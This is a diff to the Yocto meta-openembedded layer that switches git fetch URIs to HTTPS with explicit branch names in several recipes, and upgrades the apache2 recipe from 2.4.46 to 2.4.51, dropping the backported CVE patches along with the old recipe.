a/meta-openembedded/meta-python/recipes-devtools/python/python3-pillow_6.2.1.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-pillow_6.2.1.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://pillow.readthedocs.io" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=55c0f320370091249c1755c0d2b48e89" -SRC_URI = "git://github.com/python-pillow/Pillow.git;branch=6.2.x \ +SRC_URI = "git://github.com/python-pillow/Pillow.git;branch=6.2.x;protocol=https \ file://0001-support-cross-compiling.patch \ file://0001-explicitly-set-compile-options.patch \ " diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-pkgconfig_1.4.0.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-pkgconfig_1.4.0.bb index fc7a47a43d..53f4db14ae 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-pkgconfig_1.4.0.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-pkgconfig_1.4.0.bb @@ -4,7 +4,7 @@ SECTION = "devel/python" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=faa7f82be8f220bff6156be4790344fc" -SRC_URI = "git://github.com/matze/pkgconfig.git" +SRC_URI = "git://github.com/matze/pkgconfig.git;branch=master;protocol=https" SRCREV ?= "8af0102346847e8873af8e76ab3f34ba9da806e2" RDEPENDS_${PN} = "pkgconfig \ diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-prctl_1.7.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-prctl_1.7.bb index 54620a0661..1f179852ca 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-prctl_1.7.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-prctl_1.7.bb @@ -13,7 +13,7 @@ B = "${S}" SRCREV = "57cd0a7cad76e8f8792eea22ee5b5d17bae0a90f" PV = "1.7+git${SRCPV}" -SRC_URI = "git://github.com/seveas/python-prctl;branch=master \ +SRC_URI = "git://github.com/seveas/python-prctl;branch=master;protocol=https \ file://0001-support-cross-complication.patch \ " inherit setuptools3 python3native diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-wheel_0.33.6.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-wheel_0.33.6.bb index 025b2eea9d..af7f49fdcb 100644 --- a/meta-openembedded/meta-python/recipes-devtools/python/python3-wheel_0.33.6.bb +++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-wheel_0.33.6.bb @@ -4,7 +4,7 @@ SECTION = "devel/python" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=9d66b41bc2a080e7174acc5dffecd752" -SRC_URI = "git://github.com/pypa/wheel.git" +SRC_URI = "git://github.com/pypa/wheel.git;branch=master;protocol=https" SRCREV ?= "b227ddd5beaba49294017d061d501f6d433393b0" diff --git a/meta-openembedded/meta-python/recipes-extended/python-blivet/python3-blivet_3.1.4.bb b/meta-openembedded/meta-python/recipes-extended/python-blivet/python3-blivet_3.1.4.bb index 2b5b253b5d..52ae91484a 100644 --- a/meta-openembedded/meta-python/recipes-extended/python-blivet/python3-blivet_3.1.4.bb +++ b/meta-openembedded/meta-python/recipes-extended/python-blivet/python3-blivet_3.1.4.bb @@ -9,7 +9,7 @@ S = "${WORKDIR}/git" B = "${S}" SRCREV = "9b5ad2d5b5df159963e1c6c24523e1dfe1f71435" -SRC_URI = "git://github.com/rhinstaller/blivet;branch=3.1-release \ +SRC_URI = "git://github.com/rhinstaller/blivet;branch=3.1-release;protocol=https \ file://0001-comment-out-selinux.patch \ file://0002-run_program-support-timeout.patch \ file://0003-support-infinit-timeout.patch \ diff --git a/meta-openembedded/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.1.10.bb b/meta-openembedded/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.1.10.bb index 92402bee56..809d09e3ad 100644 --- a/meta-openembedded/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.1.10.bb +++ b/meta-openembedded/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.1.10.bb @@ -9,7 +9,7 @@ S = "${WORKDIR}/git" B = "${S}" SRCREV = "67ec0b7a0e065ba24ab87963409bfb21b2aac6dd" -SRC_URI = "git://github.com/rhinstaller/blivet-gui;branch=master \ +SRC_URI = "git://github.com/rhinstaller/blivet-gui;branch=master;protocol=https \ file://0001-Fix-return-type-of-BlivetUtils.get_disks-1658893.patch \ " diff --git a/meta-openembedded/meta-python/recipes-extended/python-cson/python3-cson_git.bb b/meta-openembedded/meta-python/recipes-extended/python-cson/python3-cson_git.bb index 5c74c7a307..4d234d311d 100644 --- a/meta-openembedded/meta-python/recipes-extended/python-cson/python3-cson_git.bb +++ b/meta-openembedded/meta-python/recipes-extended/python-cson/python3-cson_git.bb @@ -8,7 +8,7 @@ SECTION = "devel/python" LIC_FILES_CHKSUM = "file://LICENSE;md5=7709d2635e63ab96973055a23c2a4cac" SRCREV = "f3f2898c44bb16b951d3e9f2fbf6d1c4158edda2" -SRC_URI = "git://github.com/gt3389b/python-cson.git" +SRC_URI = "git://github.com/gt3389b/python-cson.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-python/recipes-extended/python-pyparted/python-pyparted.inc b/meta-openembedded/meta-python/recipes-extended/python-pyparted/python-pyparted.inc index 97054487f9..2322cf1092 100644 --- a/meta-openembedded/meta-python/recipes-extended/python-pyparted/python-pyparted.inc +++ b/meta-openembedded/meta-python/recipes-extended/python-pyparted/python-pyparted.inc @@ -12,7 +12,7 @@ DEPENDS += "parted" # upstream only publishes releases in github archives which are discouraged SRCREV = "481510c10866851844b19f3d2ffcdaa37efc0cf8" -SRC_URI = "git://github.com/rhinstaller/pyparted.git;protocol=https" +SRC_URI = "git://github.com/rhinstaller/pyparted.git;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache-mod/apache-websocket_git.bb b/meta-openembedded/meta-webserver/recipes-httpd/apache-mod/apache-websocket_git.bb index 3cbab22c3d..0b4bab5753 100644 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache-mod/apache-websocket_git.bb +++ b/meta-openembedded/meta-webserver/recipes-httpd/apache-mod/apache-websocket_git.bb @@ -11,7 +11,7 @@ RDEPENDS_${PN} += "apache2" # Original (github.com/disconnect/apache-websocket) is dead since 2012, the # fork contains patches from the modules ML and fixes CVE compliance issues -SRC_URI = "git://github.com/jchampio/apache-websocket.git" +SRC_URI = "git://github.com/jchampio/apache-websocket.git;branch=master;protocol=https" SRCREV = "6968083264b90b89b1b9597a4ca03ba29e7ea2e1" diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2020-13950.patch b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2020-13950.patch deleted file mode 100644 index 4eb6b85b1a..0000000000 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2020-13950.patch +++ /dev/null @@ -1,45 +0,0 @@ -From 8c162db8b65b2193e622b780e8c6516d4265f68b Mon Sep 17 00:00:00 2001 -From: Yann Ylavic -Date: Mon, 11 May 2015 15:48:58 +0000 -Subject: [PATCH] mod_proxy_http: follow up to r1656259. The proxy connection - may be NULL during prefetch, don't try to dereference it! Still - origin->keepalive will be set according to p_conn->close by the caller - (proxy_http_handler). - -git-svn-id: https://svn.apache.org/repos/asf/httpd/httpd/trunk@1678771 13f79535-47bb-0310-9956-ffa450edef68 - -Upstream-Status: Backport -CVE: CVE-2020-35504 - -Reference to upstream patch: -https://bugzilla.redhat.com/show_bug.cgi?id=1966738 -https://github.com/apache/httpd/commit/8c162db8b65b2193e622b780e8c6516d4265f68b - -Signed-off-by: Li Wang ---- - modules/proxy/mod_proxy_http.c | 2 -- - 1 file changed, 2 deletions(-) - -diff --git a/modules/proxy/mod_proxy_http.c b/modules/proxy/mod_proxy_http.c -index ec1e042..5f507d5 100644 ---- a/modules/proxy/mod_proxy_http.c -+++ b/modules/proxy/mod_proxy_http.c -@@ -570,7 +570,6 @@ static int ap_proxy_http_prefetch(proxy_http_req_t *req, - apr_off_t bytes; - int force10, rv; - apr_read_type_e block; -- conn_rec *origin = p_conn->connection; - - if (apr_table_get(r->subprocess_env, "force-proxy-request-1.0")) { - if (req->expecting_100) { -@@ -630,7 +629,6 @@ static int ap_proxy_http_prefetch(proxy_http_req_t *req, - "chunked body with Content-Length (C-L ignored)", - c->client_ip, c->remote_host ? c->remote_host: ""); - req->old_cl_val = NULL; -- origin->keepalive = AP_CONN_CLOSE; - p_conn->close = 1; - } - --- -2.7.4 - diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2020-35452.patch b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2020-35452.patch deleted file mode 100644 index 001ca9252d..0000000000 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2020-35452.patch +++ /dev/null @@ -1,49 +0,0 @@ -From 3b6431eb9c9dba603385f70a2131ab4a01bf0d3b Mon Sep 17 00:00:00 2001 -From: Yann Ylavic -Date: Mon, 18 Jan 2021 17:39:12 +0000 -Subject: [PATCH] Merge r1885659 from trunk: - -mod_auth_digest: Fast validation of the nonce's base64 to fail early if - the format can't match anyway. - -Submitted by: ylavic -Reviewed by: ylavic, covener, jailletc36 - -git-svn-id: https://svn.apache.org/repos/asf/httpd/httpd/branches/2.4.x@1885666 13f79535-47bb-0310-9956-ffa450edef68 - -Upstream-Status: Backport -CVE: CVE-2020-35452 - -Reference to upstream patch: -https://security-tracker.debian.org/tracker/CVE-2020-35452 -https://github.com/apache/httpd/commit/3b6431eb9c9dba603385f70a2131ab4a01bf0d3b - -Signed-off-by: Li Wang ---- - modules/aaa/mod_auth_digest.c | 9 +++++++-- - 1 file changed, 7 insertions(+), 2 deletions(-) - -diff --git a/modules/aaa/mod_auth_digest.c b/modules/aaa/mod_auth_digest.c -index b760941..0825b1b 100644 ---- a/modules/aaa/mod_auth_digest.c -+++ b/modules/aaa/mod_auth_digest.c -@@ -1422,9 +1422,14 @@ static int check_nonce(request_rec *r, digest_header_rec *resp, - time_rec nonce_time; - char tmp, hash[NONCE_HASH_LEN+1]; - -- if (strlen(resp->nonce) != NONCE_LEN) { -+ /* Since the time part of the nonce is a base64 encoding of an -+ * apr_time_t (8 bytes), it should end with a '=', fail early otherwise. -+ */ -+ if (strlen(resp->nonce) != NONCE_LEN -+ || resp->nonce[NONCE_TIME_LEN - 1] != '=') { - ap_log_rerror(APLOG_MARK, APLOG_ERR, 0, r, APLOGNO(01775) -- "invalid nonce %s received - length is not %d", -+ "invalid nonce '%s' received - length is not %d " -+ "or time encoding is incorrect", - resp->nonce, NONCE_LEN); - note_digest_auth_failure(r, conf, resp, 1); - return HTTP_UNAUTHORIZED; --- -2.7.4 - diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-26690.patch b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-26690.patch deleted file mode 100644 index d3aea9e122..0000000000 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-26690.patch +++ /dev/null @@ -1,39 +0,0 @@ -From 67bd9bfe6c38831e14fe7122f1d84391472498f8 Mon Sep 17 00:00:00 2001 -From: Yann Ylavic -Date: Mon, 1 Mar 2021 20:07:08 +0000 -Subject: [PATCH] mod_session: save one apr_strtok() in - session_identity_decode(). - -When the encoding is invalid (missing '='), no need to parse further. - -git-svn-id: https://svn.apache.org/repos/asf/httpd/httpd/trunk@1887050 13f79535-47bb-0310-9956-ffa450edef68 - -Upstream-Status: Backport -CVE: CVE-2021-26690 - -Reference to upstream patch: -https://security-tracker.debian.org/tracker/CVE-2021-26690 -https://github.com/apache/httpd/commit/67bd9bfe6c38831e14fe7122f1d84391472498f8 - -Signed-off-by: Li Wang ---- - modules/session/mod_session.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/modules/session/mod_session.c b/modules/session/mod_session.c -index ebd05b0..af70f6b 100644 ---- a/modules/session/mod_session.c -+++ b/modules/session/mod_session.c -@@ -404,8 +404,8 @@ static apr_status_t session_identity_decode(request_rec * r, session_rec * z) - char *plast = NULL; - const char *psep = "="; - char *key = apr_strtok(pair, psep, &plast); -- char *val = apr_strtok(NULL, psep, &plast); - if (key && *key) { -+ char *val = apr_strtok(NULL, sep, &plast); - if (!val || !*val) { - apr_table_unset(z->entries, key); - } --- -2.7.4 - diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-26691.patch b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-26691.patch deleted file mode 100644 index f9cf868d01..0000000000 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-26691.patch +++ /dev/null @@ -1,35 +0,0 @@ -From 7e09dd714fc62c08c5b0319ed7b9702594faf49b Mon Sep 17 00:00:00 2001 -From: Yann Ylavic -Date: Mon, 1 Mar 2021 20:13:54 +0000 -Subject: [PATCH] mod_session: account for the '&' in identity_concat(). - -git-svn-id: https://svn.apache.org/repos/asf/httpd/httpd/trunk@1887052 13f79535-47bb-0310-9956-ffa450edef68 - -Upstream-Status: Backport -CVE: CVE-2021-26691 - -Reference to upstream patch: -https://bugzilla.redhat.com/show_bug.cgi?id=1966732 -https://github.com/apache/httpd/commit/7e09dd714fc62c08c5b0319ed7b9702594faf49b - -Signed-off-by: Li Wang ---- - modules/session/mod_session.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/modules/session/mod_session.c b/modules/session/mod_session.c -index 7ee477c..ebd05b0 100644 ---- a/modules/session/mod_session.c -+++ b/modules/session/mod_session.c -@@ -317,7 +317,7 @@ static apr_status_t ap_session_set(request_rec * r, session_rec * z, - static int identity_count(void *v, const char *key, const char *val) - { - int *count = v; -- *count += strlen(key) * 3 + strlen(val) * 3 + 1; -+ *count += strlen(key) * 3 + strlen(val) * 3 + 2; - return 1; - } - --- -2.7.4 - diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-30641.patch b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-30641.patch deleted file mode 100644 index 7f74c85e33..0000000000 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/CVE-2021-30641.patch +++ /dev/null @@ -1,66 +0,0 @@ -From 6141d5aa3f5cf8f1b89472e7fdb66578810d0ae3 Mon Sep 17 00:00:00 2001 -From: Eric Covener -Date: Wed, 21 Apr 2021 01:02:11 +0000 -Subject: [PATCH] legacy default slash-matching behavior w/ 'MergeSlashes OFF' - -git-svn-id: https://svn.apache.org/repos/asf/httpd/httpd/trunk@1889036 13f79535-47bb-0310-9956-ffa450edef68 - -Upstream-Status: Backport -CVE: CVE-2021-30641 - -Reference to upstream patch: -https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-30641 -https://github.com/apache/httpd/commit/6141d5aa3f5cf8f1b89472e7fdb66578810d0ae3 - -Signed-off-by: Li Wang ---- - server/request.c | 19 ++++++++++++++++--- - 1 file changed, 16 insertions(+), 3 deletions(-) - -diff --git a/server/request.c b/server/request.c -index d5c558a..18625af 100644 ---- a/server/request.c -+++ b/server/request.c -@@ -1419,7 +1419,20 @@ AP_DECLARE(int) ap_location_walk(request_rec *r) - - cache = prep_walk_cache(AP_NOTE_LOCATION_WALK, r); - cached = (cache->cached != NULL); -- entry_uri = r->uri; -+ -+ /* -+ * When merge_slashes is set to AP_CORE_CONFIG_OFF the slashes in r->uri -+ * have not been merged. But for Location walks we always go with merged -+ * slashes no matter what merge_slashes is set to. -+ */ -+ if (sconf->merge_slashes != AP_CORE_CONFIG_OFF) { -+ entry_uri = r->uri; -+ } -+ else { -+ char *uri = apr_pstrdup(r->pool, r->uri); -+ ap_no2slash(uri); -+ entry_uri = uri; -+ } - - /* If we have an cache->cached location that matches r->uri, - * and the vhost's list of locations hasn't changed, we can skip -@@ -1486,7 +1499,7 @@ AP_DECLARE(int) ap_location_walk(request_rec *r) - pmatch = apr_palloc(rxpool, nmatch*sizeof(ap_regmatch_t)); - } - -- if (ap_regexec(entry_core->r, entry_uri, nmatch, pmatch, 0)) { -+ if (ap_regexec(entry_core->r, r->uri, nmatch, pmatch, 0)) { - continue; - } - -@@ -1496,7 +1509,7 @@ AP_DECLARE(int) ap_location_walk(request_rec *r) - apr_table_setn(r->subprocess_env, - ((const char **)entry_core->refs->elts)[i], - apr_pstrndup(r->pool, -- entry_uri + pmatch[i].rm_so, -+ r->uri + pmatch[i].rm_so, - pmatch[i].rm_eo - pmatch[i].rm_so)); - } - } --- -2.7.4 - diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.46.bb b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.46.bb deleted file mode 100644 index 4fc1f16317..0000000000 --- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.46.bb +++ /dev/null @@ -1,231 +0,0 @@ -DESCRIPTION = "The Apache HTTP Server is a powerful, efficient, and \ -extensible web server." -SUMMARY = "Apache HTTP Server" -HOMEPAGE = "http://httpd.apache.org/" -SECTION = "net" -LICENSE = "Apache-2.0" - -SRC_URI = "${APACHE_MIRROR}/httpd/httpd-${PV}.tar.bz2 \ - file://0001-configure-use-pkg-config-for-PCRE-detection.patch \ - file://0002-apache2-bump-up-the-core-size-limit-if-CoreDumpDirec.patch \ - file://0003-apache2-do-not-export-apr-apr-util-symbols-when-usin.patch \ - file://0004-apache2-log-the-SELinux-context-at-startup.patch \ - file://0005-replace-lynx-to-curl-in-apachectl-script.patch \ - file://0006-apache2-fix-the-race-issue-of-parallel-installation.patch \ - file://0007-apache2-allow-to-disable-selinux-support.patch \ - file://apache-configure_perlbin.patch \ - file://0001-support-apxs.in-force-destdir-to-be-empty-string.patch \ - file://CVE-2020-13950.patch \ - file://CVE-2020-35452.patch \ - file://CVE-2021-26690.patch \ - file://CVE-2021-26691.patch \ - file://CVE-2021-30641.patch \ - " - -SRC_URI_append_class-target = " \ - file://0008-apache2-do-not-use-relative-path-for-gen_test_char.patch \ - file://init \ - file://apache2-volatile.conf \ - file://apache2.service \ - file://volatiles.04_apache2 \ - " - -LIC_FILES_CHKSUM = "file://LICENSE;md5=bddeddfac80b2c9a882241d008bb41c3" -SRC_URI[md5sum] = "7d661ea5e736dac5e2761d9f49fe8361" -SRC_URI[sha256sum] = "740eddf6e1c641992b22359cabc66e6325868c3c5e2e3f98faf349b61ecf41ea" - -S = "${WORKDIR}/httpd-${PV}" - -inherit autotools update-rc.d pkgconfig systemd update-alternatives - -DEPENDS = "openssl expat pcre apr apr-util apache2-native " - -CVE_PRODUCT = "http_server" - -SSTATE_SCAN_FILES += "apxs config_vars.mk config.nice" - -PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'selinux', d)}" -PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux,libselinux" -PACKAGECONFIG[openldap] = "--enable-ldap --enable-authnz-ldap,--disable-ldap --disable-authnz-ldap,openldap" -PACKAGECONFIG[zlib] = "--enable-deflate,,zlib,zlib" - -CFLAGS_append = " -DPATH_MAX=4096" - -EXTRA_OECONF_class-target = "\ - --enable-layout=Debian \ - --prefix=${base_prefix} \ - --exec_prefix=${exec_prefix} \ - --includedir=${includedir}/${BPN} \ - --sysconfdir=${sysconfdir}/${BPN} \ - --datadir=${datadir}/${BPN} \ - --libdir=${libdir} \ - --libexecdir=${libexecdir}/${BPN}/modules \ - --localstatedir=${localstatedir} \ - --enable-ssl \ - --with-dbm=sdbm \ - --with-gdbm=no \ - --with-ndbm=no \ - --with-berkeley-db=no \ - --enable-info \ - --enable-rewrite \ - --enable-mpms-shared \ - ap_cv_void_ptr_lt_long=no \ - ac_cv_have_threadsafe_pollset=no \ - " - -EXTRA_OECONF_class-native = "\ - --prefix=${prefix} \ - --includedir=${includedir}/${BPN} \ - --sysconfdir=${sysconfdir}/${BPN} \ - --datadir=${datadir}/${BPN} \ - --libdir=${libdir} \ - --libexecdir=${libdir}/${BPN}/modules \ - --localstatedir=${localstatedir} \ - " - -do_configure_prepend() { - sed -i -e 's:$''{prefix}/usr/lib/cgi-bin:$''{libexecdir}/cgi-bin:g' ${S}/config.layout -} - -do_install_append_class-target() { - install -d ${D}/${sysconfdir}/init.d - - cat ${WORKDIR}/init | \ - sed -e 's,/usr/sbin/,${sbindir}/,g' \ - -e 's,/usr/bin/,${bindir}/,g' \ - -e 's,/usr/lib/,${libdir}/,g' \ - -e 's,/etc/,${sysconfdir}/,g' \ - -e 's,/usr/,${prefix}/,g' > ${D}/${sysconfdir}/init.d/${BPN} - - chmod 755 ${D}/${sysconfdir}/init.d/${BPN} - - # Remove the goofy original files... - rm -rf ${D}/${sysconfdir}/${BPN}/original - - install -d ${D}${sysconfdir}/${BPN}/conf.d - install -d ${D}${sysconfdir}/${BPN}/modules.d - - # Ensure configuration file pulls in conf.d and modules.d - printf "\nIncludeOptional ${sysconfdir}/${BPN}/conf.d/*.conf" >> ${D}/${sysconfdir}/${BPN}/httpd.conf - printf "\nIncludeOptional ${sysconfdir}/${BPN}/modules.d/*.load" >> ${D}/${sysconfdir}/${BPN}/httpd.conf - printf "\nIncludeOptional ${sysconfdir}/${BPN}/modules.d/*.conf\n\n" >> ${D}/${sysconfdir}/${BPN}/httpd.conf - - # Match with that is in init script - printf "\nPidFile /run/httpd.pid" >> ${D}/${sysconfdir}/${BPN}/httpd.conf - - # Set 'ServerName' to fix error messages when restart apache service - sed -i 's/^#ServerName www.example.com/ServerName localhost/' ${D}/${sysconfdir}/${BPN}/httpd.conf - - sed -i 's/^ServerRoot/#ServerRoot/' ${D}/${sysconfdir}/${BPN}/httpd.conf - - sed -i -e 's,${STAGING_DIR_TARGET},,g' \ - -e 's,${DEBUG_PREFIX_MAP},,g' \ - -e 's,-fdebug-prefix-map[^ ]*,,g; s,-fmacro-prefix-map[^ ]*,,g' \ - -e 's,${HOSTTOOLS_DIR}/,,g' \ - -e 's,APU_INCLUDEDIR = .*,APU_INCLUDEDIR = ,g' \ - -e 's,APU_CONFIG = .*,APU_CONFIG = ,g' ${D}${datadir}/apache2/build/config_vars.mk - - sed -i -e 's,--sysroot=${STAGING_DIR_TARGET},,g' \ - -e 's,${DEBUG_PREFIX_MAP},,g' \ - -e 's,${RECIPE_SYSROOT},,g' \ - -e 's,-fdebug-prefix-map[^ ]*,,g; s,-fmacro-prefix-map[^ ]*,,g' \ - -e 's,APU_INCLUDEDIR = .*,APU_INCLUDEDIR = ,g' \ - -e 's,".*/configure","configure",g' ${D}${datadir}/apache2/build/config.nice - - if ${@bb.utils.contains('DISTRO_FEATURES', 'systemd', 'true', 'false', d)}; then - install -d ${D}${sysconfdir}/tmpfiles.d/ - install -m 0644 ${WORKDIR}/apache2-volatile.conf ${D}${sysconfdir}/tmpfiles.d/ - - install -d ${D}${systemd_unitdir}/system - install -m 0644 ${WORKDIR}/apache2.service ${D}${systemd_unitdir}/system - sed -i -e 's,@SBINDIR@,${sbindir},g' ${D}${systemd_unitdir}/system/apache2.service - sed -i -e 's,@BASE_BINDIR@,${base_bindir},g' ${D}${systemd_unitdir}/system/apache2.service - elif ${@bb.utils.contains('DISTRO_FEATURES', 'sysvinit', 'true', 'false', d)}; then - install -d ${D}${sysconfdir}/default/volatiles - install -m 0644 ${WORKDIR}/volatiles.04_apache2 ${D}${sysconfdir}/default/volatiles/04_apache2 - fi - - rm -rf ${D}${localstatedir} ${D}${sbindir}/envvars* - chown -R root:root ${D} -} - -do_install_append_class-native() { - install -d ${D}${bindir} ${D}${libdir} - install -m 755 server/gen_test_char ${D}${bindir} -} - -SYSROOT_PREPROCESS_FUNCS_append_class-target = " apache_sysroot_preprocess" - -apache_sysroot_preprocess() { - install -d ${SYSROOT_DESTDIR}${bindir_crossscripts} - install -m 755 ${D}${bindir}/apxs ${SYSROOT_DESTDIR}${bindir_crossscripts} - install -d ${SYSROOT_DESTDIR}${sbindir} - install -m 755 ${D}${sbindir}/apachectl ${SYSROOT_DESTDIR}${sbindir} - sed -i 's!my $installbuilddir = .*!my $installbuilddir = "${STAGING_DIR_HOST}/${datadir}/${BPN}/build";!' ${SYSROOT_DESTDIR}${bindir_crossscripts}/apxs - sed -i 's!my $libtool = .*!my $libtool = "${STAGING_BINDIR_CROSS}/${HOST_SYS}-libtool";!' ${SYSROOT_DESTDIR}${bindir_crossscripts}/apxs - - sed -i 's!^APR_CONFIG = .*!APR_CONFIG = ${STAGING_BINDIR_CROSS}/apr-1-config!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk - sed -i 's!^APU_CONFIG = .*!APU_CONFIG = ${STAGING_BINDIR_CROSS}/apu-1-config!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk - sed -i 's!^includedir = .*!includedir = ${STAGING_INCDIR}/apache2!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk - sed -i 's!^CFLAGS = -I[^ ]*!CFLAGS = -I${STAGING_INCDIR}/openssl!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk - sed -i 's!^EXTRA_LDFLAGS = .*!EXTRA_LDFLAGS = -L${STAGING_LIBDIR}!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk - sed -i 's!^EXTRA_INCLUDES = .*!EXTRA_INCLUDES = -I$(includedir) -I. -I${STAGING_INCDIR}!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk - sed -i 's!--sysroot=[^ ]*!--sysroot=${STAGING_DIR_HOST}!' ${SYSROOT_DESTDIR}${datadir}/${BPN}/build/config_vars.mk -} - -# Implications - used by update-rc.d scripts -INITSCRIPT_NAME = "apache2" -INITSCRIPT_PARAMS = "defaults 91 20" - -SYSTEMD_SERVICE_${PN} = "apache2.service" -SYSTEMD_AUTO_ENABLE_${PN} = "enable" - -ALTERNATIVE_${PN}-doc = "htpasswd.1" -ALTERNATIVE_LINK_NAME[htpasswd.1] = "${mandir}/man1/htpasswd.1" - -PACKAGES = "${PN}-scripts ${PN}-doc ${PN}-dev ${PN}-dbg ${PN}" - -CONFFILES_${PN} = "${sysconfdir}/${BPN}/httpd.conf \ - ${sysconfdir}/${BPN}/magic \ - ${sysconfdir}/${BPN}/mime.types \ - ${sysconfdir}/${BPN}/extra/*" - -# We override here rather than append so that .so links are -# included in the runtime package rather than here (-dev) -# and to get build, icons, error into the -dev package -FILES_${PN}-dev = "${datadir}/${BPN}/build \ - ${datadir}/${BPN}/icons \ - ${datadir}/${BPN}/error \ - ${includedir}/${BPN} \ - ${bindir}/apxs \ - " - -# Add the manual to -doc -FILES_${PN}-doc += " ${datadir}/${BPN}/manual" - -FILES_${PN}-scripts += "${bindir}/dbmmanage" - -# Override this too - here is the default, less datadir -FILES_${PN} = "${bindir} ${sbindir} ${libexecdir} ${libdir} \ - ${sysconfdir} ${libdir}/${BPN}" - -# We want htdocs and cgi-bin to go with the binary -FILES_${PN} += "${datadir}/${BPN}/ ${libdir}/cgi-bin" - -FILES_${PN}-dbg += "${libdir}/${BPN}/modules/.debug" - -RDEPENDS_${PN} += "openssl libgcc" -RDEPENDS_${PN}-scripts += "perl ${PN}" -RDEPENDS_${PN}-dev = "perl" - -BBCLASSEXTEND = "native" - -pkg_postinst_${PN}() { - if [ -z "$D" ]; then - if type systemd-tmpfiles >/dev/null; then - systemd-tmpfiles --create - elif [ -e ${sysconfdir}/init.d/populate-volatile.sh ]; then - ${sysconfdir}/init.d/populate-volatile.sh update - fi - fi -} diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.51.bb b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.51.bb new file mode 100644 index 0000000000..d6e736d31d --- /dev/null +++ b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.51.bb @@ -0,0 +1,225 @@ +DESCRIPTION = "The Apache HTTP Server is a powerful, efficient, and \ +extensible web server." +SUMMARY = "Apache HTTP Server" +HOMEPAGE = "http://httpd.apache.org/" +SECTION = "net" +LICENSE = "Apache-2.0" + +SRC_URI = "${APACHE_MIRROR}/httpd/httpd-${PV}.tar.bz2 \ + file://0001-configure-use-pkg-config-for-PCRE-detection.patch \ + file://0002-apache2-bump-up-the-core-size-limit-if-CoreDumpDirec.patch \ + file://0003-apache2-do-not-export-apr-apr-util-symbols-when-usin.patch \ + file://0004-apache2-log-the-SELinux-context-at-startup.patch \ + file://0005-replace-lynx-to-curl-in-apachectl-script.patch \ + file://0006-apache2-fix-the-race-issue-of-parallel-installation.patch \ + file://0007-apache2-allow-to-disable-selinux-support.patch \ + file://apache-configure_perlbin.patch \ + file://0001-support-apxs.in-force-destdir-to-be-empty-string.patch \ + " + +SRC_URI_append_class-target = " \ + file://0008-apache2-do-not-use-relative-path-for-gen_test_char.patch \ + file://init \ + file://apache2-volatile.conf \ + file://apache2.service \ + file://volatiles.04_apache2 \ + " + +LIC_FILES_CHKSUM = "file://LICENSE;md5=bddeddfac80b2c9a882241d008bb41c3" +SRC_URI[sha256sum] = "20e01d81fecf077690a4439e3969a9b22a09a8d43c525356e863407741b838f4" + +S = "${WORKDIR}/httpd-${PV}" + +inherit autotools update-rc.d pkgconfig systemd update-alternatives + +DEPENDS = "openssl expat pcre apr apr-util apache2-native " + +CVE_PRODUCT = "http_server" + +SSTATE_SCAN_FILES += "apxs config_vars.mk config.nice" + +PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'selinux', d)}" 